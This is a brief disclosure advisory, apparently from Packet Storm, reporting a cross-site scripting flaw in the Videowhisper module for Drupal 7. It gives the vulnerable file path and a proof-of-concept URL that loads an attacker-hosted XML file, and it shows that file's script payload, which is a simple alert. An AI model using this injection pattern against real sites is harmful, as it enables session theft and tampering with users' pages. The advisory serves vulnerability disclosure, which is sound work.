The Videowhisper module for Drupal 7 suffers from a cross site scripting vulnerability.
55a4861f40bc38c6000abe600f7ee9ed4eaa6cd89d223aadc33cbc3a11d9369eHello,
Cross Site Scripting (XSS) vulnerability exists in videowhisper module for Drupal 7.
Vendor Notification: 22, Oct 2014
Vulnerable file: drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php
POC: http://vulnerable-website/drupal/modules/videowhisper/vwrooms/js/jsor-jcarousel/examples/special_textscroller.php?feed=http://attacker-website/xss.txt
The content of xss.txt:
<root>
<script xmlns="http://www.w3.org/2000/svg"><![CDATA[
alert('XSS');
]]></script>
</root>
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers.
Best regards
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed